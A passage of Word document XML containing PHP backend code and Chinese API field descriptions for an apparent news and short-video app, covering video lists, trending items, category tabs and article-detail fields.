    <w:p w14:paraId="6C5B1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696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8F2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videodata){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C6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video_i'] = rand(1,count($data['data'])/2-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05099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where['mychannel'] = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED1A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where['hide']   =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21BE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 = Db::name('article')-&gt;where($svideo_where)-&gt;order('des desc, id desc')-&gt;field('id,title,description,image,source,pingNum,videodate,uid,click,zan,video')-&gt;paginate(3)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94A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svideo_data['data'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F9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image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A9D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data'][$k]['image']   =   _imgUrl().$v['image'].'?imageView2/1/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB17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E1B8C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data'][$k]['image']   =   _imgUrl() . '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EAA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FBC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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3212F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1C9EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228E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data'][$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465B5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data'][$k]['user']['img'] = $user['img'] . "?imageView2/1/w/100/h/100/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B05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22C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6E1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video_data['data'][$k]['video']   =   _imgUrl().$v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568A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261B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video_data'] = $svideo_data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0306D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dian_where['hide']   =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901E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an_where['weitoutiao'] =   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18077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an_where['flags']  =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4C6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an_data = Db::name('article')-&gt;where($redian_where)-&gt;order('des desc, update_time desc')-&gt;field('id,title,dtitle,update_time')-&gt;limit(3)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFF6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redian_data as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B138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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA6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dian_time'] =   date('Y-m-d H:i:s',$v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF0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8EF0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dian_data[$k]['update_time']     =   date('H:i',$v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0D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BF1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dian_data'] = $redian_data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F1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0280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018D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C52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76AA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typeid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79F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分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358ED6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43C066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7328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7E23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Object[]} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C089F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Number} data.id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D09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data.title  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F07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B1E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id() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B779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25915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request-&gt;param('id') ? $request-&gt;param('id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D92C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request-&gt;param('limit') ? $request-&gt;param('limit') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A917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request-&gt;param('mychannel') ? $request-&gt;param('mychannel') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29876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d = $request-&gt;param('tid') ? $request-&gt;param('tid') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2F6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request-&gt;param('field') ? $request-&gt;param('field') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D577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5EC257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gt;', 1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6099DE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09E6CF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in', $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B5A3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41C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F00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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD42E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10B1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d) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7228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d'] = ['in', $tid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25939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1EEE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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE0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hide desc,des desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A86A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09B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hide desc,des desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6B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3EFE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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A97D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d'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138F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689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ield .= $field ? ',id,title,app' : 'id,title,app';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832FC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typeid')-&gt;where($where)-&gt;order($order)-&gt;limit($limit)-&gt;field($field)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17083B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781233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43D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0'] = ['id' =&gt; 999999999, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD35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1'] = ['id' =&gt; 0, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE76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2'] = ['id' =&gt; 888888888, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7B9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3'] = ['id' =&gt; 777777777, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','app'=&gt;'0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E4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_merge($datas, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE31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B7A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9D5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ff=_moban();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557BA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ff=='toutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04394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ff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DE3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fff=='qutoutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA62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ff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771F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FF3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ff='#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93B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9740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 = $data_no = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98CF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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FFE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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70C8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73D729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pp'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D7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id']      = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F59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title']   = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A9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eld) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2159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str($field, "create_time")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63818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create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3ADC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3A8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4513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create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B117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7A73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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC03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bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB02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bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95F5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013A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bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B6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bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD9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no[$i]['size']['w'] = $this-&gt;typeSize($v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65944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1E1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D468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BE59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id']      = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476B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title']   = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965A4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eld) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B51B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str($field, "create_time")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79861D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create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F6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6CA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strstr($field, "id")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C79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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0EAA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AB6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0D579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create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891E2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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBAA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02F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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F29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bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73032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bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A564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BA5A7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bg'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13B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bgSelected'] = $fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A5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s]['size']['w'] = $this-&gt;typeSize($v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA82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AB6D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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A358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7612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C15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d5 = md5(json_encode($data_yes));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448EDB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8A46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ong['id'] = '555555555';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFB4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ong['title'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B720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ong['bg'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A15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ong['bgSelected'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E4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ong['size'] = ['w'=&gt;'100'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497D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_yes[count($data_yes)] = $kong;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A48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34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ata' =&gt; $data_yes, 'typeid' =&gt; $typeid , 'no' =&gt; $data_no, 'md5' =&gt; $md5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DA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94CE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53E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Size($title = '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20E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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FA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50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11875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9B4B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ize = ceil(strlen($title) * 8.3333333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B27D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ize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01814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948C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deoTypeid() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EFF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71EB82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d'] = 132;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FFD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typeid')-&gt;where($where)-&gt;order('hide desc, des desc')-&gt;field('title,id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0186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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B3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0'] = ['id' =&gt; 0, 'title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全部</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC9D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_merge($datas, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73171D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8D06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bg'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E735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bgSelected'] = '#fff';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B51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k] = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B10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9BC1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ata' =&gt; $data, 'typeid' =&gt; $typeid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E544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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F2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9EF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7F9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view </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F873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资讯详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B77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714CE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D805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D26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58431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d        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA47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FD2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id</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资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0BE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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9A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lags</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，英文逗号分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2957D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ags</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AB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age</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>封面图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D31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ypeid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D0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lick</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C122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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E4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reate_time</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>格式是时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFFBC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pdate_time</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后更新时间，格式是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> “*</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC5E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503FA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rl</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跳转连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADF9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ource</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯来源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214417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id</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资讯发表用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F7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writer</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F452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zan</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赞的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98D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ai</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踩的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72292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ingNum</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5C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share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D9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ages_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图片数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717FD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ingNum</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
